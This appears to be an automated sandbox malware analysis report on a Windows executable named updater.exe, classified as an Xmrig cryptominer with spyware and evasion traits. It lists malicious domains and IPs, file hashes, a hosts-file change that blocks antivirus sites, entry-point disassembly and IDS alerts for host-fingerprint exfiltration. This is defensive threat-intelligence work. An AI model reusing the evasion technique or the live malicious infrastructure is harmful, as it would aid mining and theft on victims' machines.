https://172.94.1q | conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://koldiv.ru | conhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://xmrig.com/docs/algorithms | conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
141.94.96.195 | unknown | Germany | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | false
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
162.19.139.184 | xmr.2miners.com | United States | 209 | CENTURYLINK-US-LEGACY-QWESTUS | false
77.222.57.251 | koldiv.ru | Russian Federation | 44112 | SWEB-ASRU | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1478400
Start date and time: 2024-07-22 15:44:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: updater.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.mine.winEXE@59/13@4/4
EGA Information:
• Successful, ratio: 25%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target conhost.exe, PID 5596 because there are no executed functions
• Execution Graph export aborted for target updater.exe, PID 1896 because it is empty
• Execution Graph export aborted for target updater.exe, PID 6300 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• VT rate limit hit for: updater.exe
Time | Type | Description
09:44:59 | API Interceptor | 32x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
141.94.96.195 | http://pool.supportxmr.com | malicious | Unknown | pool.supportxmr.com/favicon.ico
104.20.4.235 | envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Pending_Invoice_Bank_Details_kofce_.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Update on Payment.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
162.19.139.184 | iCp2Rcgw44.exe | malicious | Xmrig |
162.19.139.184 | file.exe | malicious | Xmrig |
162.19.139.184 | Krnl.exe | malicious | Xmrig |
162.19.139.184 | cybXkFC5nF.exe | malicious | PureLog Stealer, Xmrig, zgRAT |
162.19.139.184 | Arceus.exe | malicious | Xmrig |
162.19.139.184 | i3LIe5GBgd.exe | malicious | Xmrig |
162.19.139.184 | RA95ALDCS9.exe | malicious | RedLine, Xmrig |
162.19.139.184 | SecuriteInfo.com.Win32.Evo-gen.1231.21474.exe | malicious | Vidar, Xmrig |
162.19.139.184 | SecuriteInfo.com.Trojan.DownLoader45.1081.7048.8713.exe | malicious | Xmrig |
162.19.139.184 | RemiTool v2.exe | malicious | Xmrig |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pastebin.com | DeqcE30sLb.exe | malicious | DCRat | 172.67.19.24
pastebin.com | Mx0UGSI897.exe | malicious | DCRat | 104.20.3.235
pastebin.com | eE1xnwas4F.exe | malicious | LummaC | 104.20.3.235
pastebin.com | conhost.exe | malicious | Xmrig | 104.20.3.235
pastebin.com | SecuriteInfo.com.Win64.Evo-gen.29709.21053.exe | malicious | Unknown | 104.20.3.235
pastebin.com | Software1.30.1.exe | malicious | RedLine, Xmrig | 172.67.19.24
pastebin.com | Loader.exe | malicious | LummaC, Xmrig | 104.20.3.235
pastebin.com | updater.exe | malicious | Xmrig | 172.67.19.24
pastebin.com | COMPROVANTE DE PAGAMENTO.ppam | malicious | RevengeRAT | 104.20.3.235
pastebin.com | sostener.vbs | malicious | Remcos | 172.67.19.24
xmr.2miners.com | iCp2Rcgw44.exe | malicious | Xmrig | 162.19.139.184
xmr.2miners.com | file.exe | malicious | Xmrig | 162.19.139.184
xmr.2miners.com | Krnl.exe | malicious | Xmrig | 162.19.139.184
xmr.2miners.com | cybXkFC5nF.exe | malicious | PureLog Stealer, Xmrig, zgRAT | 162.19.139.184
xmr.2miners.com | Arceus.exe | malicious | Xmrig | 162.19.139.184
xmr.2miners.com | i3LIe5GBgd.exe | malicious | Xmrig | 162.19.139.184
xmr.2miners.com | RA95ALDCS9.exe | malicious | RedLine, Xmrig | 162.19.139.184
xmr.2miners.com | SecuriteInfo.com.Win32.Evo-gen.1231.21474.exe | malicious | Vidar, Xmrig | 162.19.139.184
xmr.2miners.com | SecuriteInfo.com.Trojan.DownLoader45.1081.7048.8713.exe | malicious | Xmrig | 162.19.139.184
xmr.2miners.com | RUN.exe | malicious | Babadeda | 162.19.139.184
pool-fr.supportxmr.com | xjSglbp263.exe | malicious | Xmrig | 141.94.96.71
pool-fr.supportxmr.com | gwRQinPOHB.exe | malicious | Xmrig | 141.94.96.195
pool-fr.supportxmr.com | FieroHack.exe | malicious | Xmrig | 141.94.96.195
pool-fr.supportxmr.com | FieroHack.exe | malicious | LummaC, Xmrig | 141.94.96.195
pool-fr.supportxmr.com | gVRqUej0ci.exe | malicious | Xmrig | 141.94.96.71
pool-fr.supportxmr.com | h2UFp4aCRq.exe | malicious | LoaderBot, Xmrig | 141.94.96.144
pool-fr.supportxmr.com | setup.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine | 141.94.96.71
pool-fr.supportxmr.com | SecuriteInfo.com.Win32.Evo-gen.18867.15916.exe | malicious | Xmrig | 141.94.96.71
pool-fr.supportxmr.com | http://pool.supportxmr.com | malicious | Unknown | 141.94.96.71
pool-fr.supportxmr.com | http://pool.supportxmr.com | malicious | Unknown | 141.94.96.195
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SWEB-ASRU | AbvmEnagz3.exe | malicious | DCRat | 77.222.62.219
SWEB-ASRU | ppXCre3i9k.exe | malicious | DCRat | 77.222.57.208
SWEB-ASRU | http://hostaruba0.temp.swtest.ru/008997/areautenti/login.php | malicious | HTMLPhisher | 77.222.57.208
SWEB-ASRU | 4y2bJd0meT.exe | malicious | DCRat, PureLog Stealer, zgRAT | 77.222.62.71
SWEB-ASRU | http://fansharf.ru | malicious | Unknown | 77.222.61.25
SWEB-ASRU | xdUF3ppIU4.exe | malicious | DCRat, PureLog Stealer, zgRAT | 77.222.62.71
SWEB-ASRU | GC_Invoice_02052024_docs.exe | malicious | FormBook, GuLoader | 77.222.57.185
SWEB-ASRU | STATEMENT_OF_ACCOUNT_xlxs.exe | malicious | FormBook, GuLoader | 77.222.57.185
SWEB-ASRU | http://salesrent5.temp.swtest.ru/app/MTTRBDFH/index.php?FGDD=1 | malicious | Unknown | 77.222.62.71
SWEB-ASRU | cZKS6afo0o.exe | malicious | DCRat | 77.222.40.147
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | http://nys-ns.com/ | malicious | Unknown | 141.95.124.137
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | http://nys-ns.com/ | malicious | Unknown | 141.95.124.137
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | ZPPEqPIBy7.elf | malicious | Unknown | 130.133.207.43
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | D8J2VuFPRL.rtf | malicious | FormBook | 141.95.110.31
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | Pn0jlaHvxE.elf | malicious | Mirai, Gafgyt, Okiru | 141.99.20.144
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | 1gx339YsKN.elf | malicious | Mirai, Gafgyt, Okiru | 141.88.171.81
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | faBNhIKHq4.elf | malicious | Mirai, Gafgyt, Okiru | 141.89.138.130
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | ts2d2a5oFa.elf | malicious | Mirai, Gafgyt, Okiru | 141.36.140.1
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | EKi4eGLprr.elf | malicious | Mirai, Okiru | 141.32.20.220
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | 92.249.48.47-skid.ppc-2024-07-20T09_04_20.elf | malicious | Mirai, Moobot | 160.45.212.106
CLOUDFLARENETUS | ATT96885.htm | malicious | HTMLPhisher | 188.114.96.3
CLOUDFLARENETUS | https://liceultehnologicrosiajiu.ro/ulin/ulin8ce.html | malicious | CVE-2024-21412 | 104.16.230.132
CLOUDFLARENETUS | QVA-8288-9779ZPT.exe | malicious | Unknown | 172.67.182.157
CLOUDFLARENETUS | https://trk.klclick3.com/ls/click?upn=u001.F5FUvNp8lGuVBrfF8VWSt-2Befrq4JwHZUrXxYUllvBu6JQLRTleNqoOq9cK2V6H9nF6TE8i5ai18ELwuaCRLRwA-3D-3DeBON_1svWsHF9QtKh6I35BSRfJziCtreSweSmmjNgxUuzWxLFgb12Ddkvv3gPW-2BY7HCV4BtwDYPCgqFm6ezf3LGkFgw-2FasXzQ01tiusM7qj7f7wQzyFpk04U-2BNsOiH-2B6C0IEGGhuBHlH4nFGk5hM1YrilA-2FklNstU7j1vcFJG8iHzTeSRYHOXIpK0cVyPDdeQeDUKiYrTYys-2FJ6BSjWfQuGIzI8V57VImtAPAAkrpuUD31VELoL-2FwLqoqcEcJaE-2B6fpm2wPTZkCul8wgxqc4qQClvNSQEUdlWOW-2BnsmWvhHzUvBgdPRhNpiRMg8ZZ-2BBQBoSFlRkufcGBk8zdT6H-2B-2FULHcbxzCKE71NmfbhvHZ7lmXl2A-3D | malicious | Tycoon2FA | 104.17.25.14
CLOUDFLARENETUS | https://important-invite.ru/invitersvp/ | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://www.google.com.au/url?q=//www.google.co.nz/amp/s/clientdevelopmentserver.com/secure/documentattached.html | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | Play__Now___Aud_for_matthew.whistler@holcim.com.html | malicious | Unknown | 104.21.88.106
CLOUDFLARENETUS | https://automarketjobs.com/visionrepartners/ | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | 25bbed456281ea6f37cb6b295ebd0d1764156e797b4f15e0dc1bbcd7342086a9_payload.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
CLOUDFLARENETUS | https://kwxciujqil.joseph-mathieu.workers.dev/?lneigvrscbp=Y25wZ2xhbW91ci1idXNpbmVzc0Bjb25kZW5hc3QuY29t | malicious | Unknown | 172.67.135.145
CENTURYLINK-US-LEGACY-QWESTUS | http://ages-dedressmii-pertaminna-resmii.rexz.my.id/ | malicious | Unknown | 162.19.58.161
CENTURYLINK-US-LEGACY-QWESTUS | http://reedempayml.ogr.my.id/ | malicious | HTMLPhisher | 162.19.58.159
CENTURYLINK-US-LEGACY-QWESTUS | mips.elf | malicious | Mirai | 184.6.30.91
CENTURYLINK-US-LEGACY-QWESTUS | arm.elf | malicious | Mirai | 174.17.126.251
                                              https://5228753.webku.buzz/Get hashmaliciousUnknownBrowse
                                              • 162.19.58.157
                                              https://34274421.webku.buzz/Get hashmaliciousUnknownBrowse
                                              • 162.19.58.159
                                              https://shadow-rapid-sunday.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                                              • 162.19.58.159
                                              Suav289vuI.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 67.238.37.116
                                              faBNhIKHq4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 72.166.124.103
                                              U6YcZ2TLtT.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 63.149.53.202
                                              No context
Match: C:\Windows\Temp\maoxoafwbtki.sys

Associated Sample Name / URL                                   Detection   Threat Name
SecuriteInfo.com.Win32.Malware-gen.6320.5781.exe               malicious   Xmrig
xjSglbp263.exe                                                 malicious   Xmrig
gwRQinPOHB.exe                                                 malicious   Xmrig
3YHDfHLvo4.exe                                                 malicious   Phorpiex, Xmrig
conhost.exe                                                    malicious   Xmrig
Software1.30.1.exe                                             malicious   RedLine, Xmrig
SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe      malicious   Phorpiex, Xmrig
SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe             malicious   Xmrig
Loader.exe                                                     malicious   LummaC, Xmrig
updater.exe                                                    malicious   Xmrig
                                                                  Process:C:\Users\user\Desktop\updater.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):5285888
                                                                  Entropy (8bit):6.5439853687656875
                                                                  Encrypted:false
                                                                  SSDEEP:98304:PESNReLHfx5vk7bqVTrvjNaJrXWTLLE3Lu+h3mo8i5BXdzLnKwUaQJ7:MQUTfxSe5FTLL2Vhd5jzLnKtaS7
                                                                  MD5:D82677AC9971E38439A6F8069E8BA5BF
                                                                  SHA1:534B60E16989751C4E2252BBBCC38D97B979F2D0
                                                                  SHA-256:F981FF1EC7014262015FA7FF9CC01097E98ECEC7385E0828B7D91DDE5B38CE03
                                                                  SHA-512:2740AABC53D2E00B72B77F6F20A327CDAA53CA76912ED54A17B0B0FD94802AC90E7CF82210F1CFF84A42897153538CE7F37E6A02D50DB7C427C0295B0D8F3E0A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 66%
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1940658735648508
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllul3nqth:NllUa
                                                                  MD5:851531B4FD612B0BC7891B3F401A478F
                                                                  SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                  SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                  SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                  Malicious:false
                                                                  Preview:@...e.................................&..............@..........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1510207563435464
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllul2lllllZ:NllUClll
                                                                  MD5:4D98AF7F487E62A9C1D44B02674BAB7E
                                                                  SHA1:1B492B2208949EB7F18C32F309C296B4258DBA65
                                                                  SHA-256:1E3ED9CE6343DA27C6759A0F05D6DD0B92B3A9C63B6492A2DA4E4F371D9F56DA
                                                                  SHA-512:60EC859B84836E865E767FE858E70ACEC6F0FB8077B2E51D6CB4095533433B791C9A16396D69279C7F896DF003A1ED6656087B43EFA16523DA4026317CBB49E6
                                                                  Malicious:false
                                                                  Preview:@...e.................................:..............@..........
                                                                  Process:C:\Users\user\Desktop\updater.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2748
                                                                  Entropy (8bit):4.269302338623222
                                                                  Encrypted:false
                                                                  SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                                                  MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                                                  SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                                                  SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                                                  SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                                                  Malicious:true
Preview (CRLF line breaks restored; the hosts file is shown as far as the report's preview reaches):
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1 localhost
#	::1 localhost

0.0.0.0 avast.com
0.0.0.0 www.avast.com
0.0.0.0 totalav.com
0.0.0.0 www.totalav.com
0.0.0.0 scanguard.com
0.0.0.0 www.scanguard.com
                                                                  Process:C:\ProgramData\Google\Chrome\updater.exe
                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):14544
                                                                  Entropy (8bit):6.2660301556221185
                                                                  Encrypted:false
                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Win32.Malware-gen.6320.5781.exe, Detection: malicious
• Filename: xjSglbp263.exe, Detection: malicious
• Filename: gwRQinPOHB.exe, Detection: malicious
• Filename: 3YHDfHLvo4.exe, Detection: malicious
• Filename: conhost.exe, Detection: malicious
• Filename: Software1.30.1.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, Detection: malicious
• Filename: Loader.exe, Detection: malicious
• Filename: updater.exe, Detection: malicious
                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Entropy (8bit):6.5439853687656875
                                                                  TrID:
                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:updater.exe
                                                                  File size:5'285'888 bytes
                                                                  MD5:d82677ac9971e38439a6f8069e8ba5bf
                                                                  SHA1:534b60e16989751c4e2252bbbcc38d97b979f2d0
                                                                  SHA256:f981ff1ec7014262015fa7ff9cc01097e98ecec7385e0828b7d91dde5b38ce03
                                                                  SHA512:2740aabc53d2e00b72b77f6f20a327cdaa53ca76912ed54a17b0b0fd94802ac90e7cf82210f1cff84a42897153538ce7f37e6a02d50db7c427c0295b0d8f3e0a
                                                                  SSDEEP:98304:PESNReLHfx5vk7bqVTrvjNaJrXWTLLE3Lu+h3mo8i5BXdzLnKwUaQJ7:MQUTfxSe5FTLL2Vhd5jzLnKtaS7
                                                                  TLSH:E936232E2D0FA0EAC504447DC22B33A044EEBD5E579589DBDA75BEB06D150C4EC72F8A
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d..."j.e.........."...........O.....@..........@............................. Q...........`........................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x140001140
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x65A66A22 [Tue Jan 16 11:36:02 2024 UTC]
TLS Callbacks: 0x40001760, 0x1, 0x400017e0, 0x1
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: b237ac2118704db9e7609540658f5790
Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00010ED5h]
mov dword ptr [eax], 00000001h
call 00007F59611B72AFh
nop
nop
nop
dec eax
add esp, 28h
ret
nop
inc ecx
push edi
inc ecx
push esi
push esi
push edi
push ebx
dec eax
sub esp, 20h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov edi, dword ptr [eax+08h]
dec eax
mov esi, dword ptr [00010EC9h]
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F59611B72D0h
dec eax
cmp edi, eax
je 00007F59611B72CBh
dec esp
mov esi, dword ptr [000139F9h]
nop word ptr [eax+eax+00000000h]
mov ecx, 000003E8h
inc ecx
call esi
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F59611B72A7h
dec eax
cmp edi, eax
jne 00007F59611B7289h
dec eax
mov edi, dword ptr [00010E90h]
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F59611B72AEh
mov ecx, 0000001Fh
call 00007F59611C79A4h
jmp 00007F59611B72C9h
cmp dword ptr [edi], 00000000h
je 00007F59611B72ABh
mov byte ptr [0050AA81h], 00000001h
jmp 00007F59611B72BBh
mov dword ptr [edi], 00000001h
dec eax
mov ecx, dword ptr [00010E7Ah]
dec eax
mov edx, dword ptr [00010E7Bh]
call 00007F59611C799Bh
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F59611B72BBh
dec eax
mov ecx, dword ptr [00010E50h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14888 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x50e000 | 0x18c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x511000 | 0x78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x120a0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x12410 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x14a40 | 0x178 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x10a96 | 0x10c00 | 25a5b203b78f66cc2202dffba4bb867a | False | 0.45727903451492535 | data | 6.23628059943859 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x12000 | 0x3070 | 0x3200 | c05522f7e10a55cd6bc4c8e5280eb201 | False | 0.485 | data | 5.1256139374089225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x16000 | 0x4f7c48 | 0x4f5e00 | 82428ae34bef76b7af4afc7e51e1bc99 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x50e000 | 0x18c | 0x200 | eab168eb18c87146d1d80800968dd600 | False | 0.517578125 | data | 3.496130895590373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg | 0x50f000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x510000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x511000 | 0x78 | 0x200 | 01f8c7abb07b7dfe015437cf470c5706 | False | 0.232421875 | data | 1.4735891426027823 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strcat, strcpy, strlen, strncmp, strstr, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-22T15:45:08.333951+0200 | TCP | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 49724 | 443 | 192.168.2.5 | 141.94.96.195
2024-07-22T15:46:06.697997+0200 | UDP | 2047928 | ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) | 60971 | 53 | 192.168.2.5 | 1.1.1.1
2024-07-22T15:46:06.696381+0200 | TCP | 2054247 | ET MALWARE SilentCryptoMiner Agent Config Inbound | 80 | 49723 | 77.222.57.251 | 192.168.2.5
2024-07-22T15:45:05.821446+0200 | UDP | 2040353 | ET COINMINER Observed DNS Query to Cryptocurrency Mining Pool Domain (xmr .2miners .com) | 52943 | 53 | 192.168.2.5 | 1.1.1.1
2024-07-22T15:45:11.088905+0200 | TCP | 2044697 | ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 | 49708 | 80 | 192.168.2.5 | 77.222.57.251
2024-07-22T15:46:06.695665+0200 | TCP | 2044697 | ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 | 49723 | 80 | 192.168.2.5 | 77.222.57.251
                                                                  Jul 22, 2024 15:46:06.738817930 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:06.739300966 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:06.739314079 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.013176918 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.036240101 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:08.036273003 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.037463903 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.037539005 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:08.039031029 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:08.039155006 CEST44349724141.94.96.195192.168.2.5
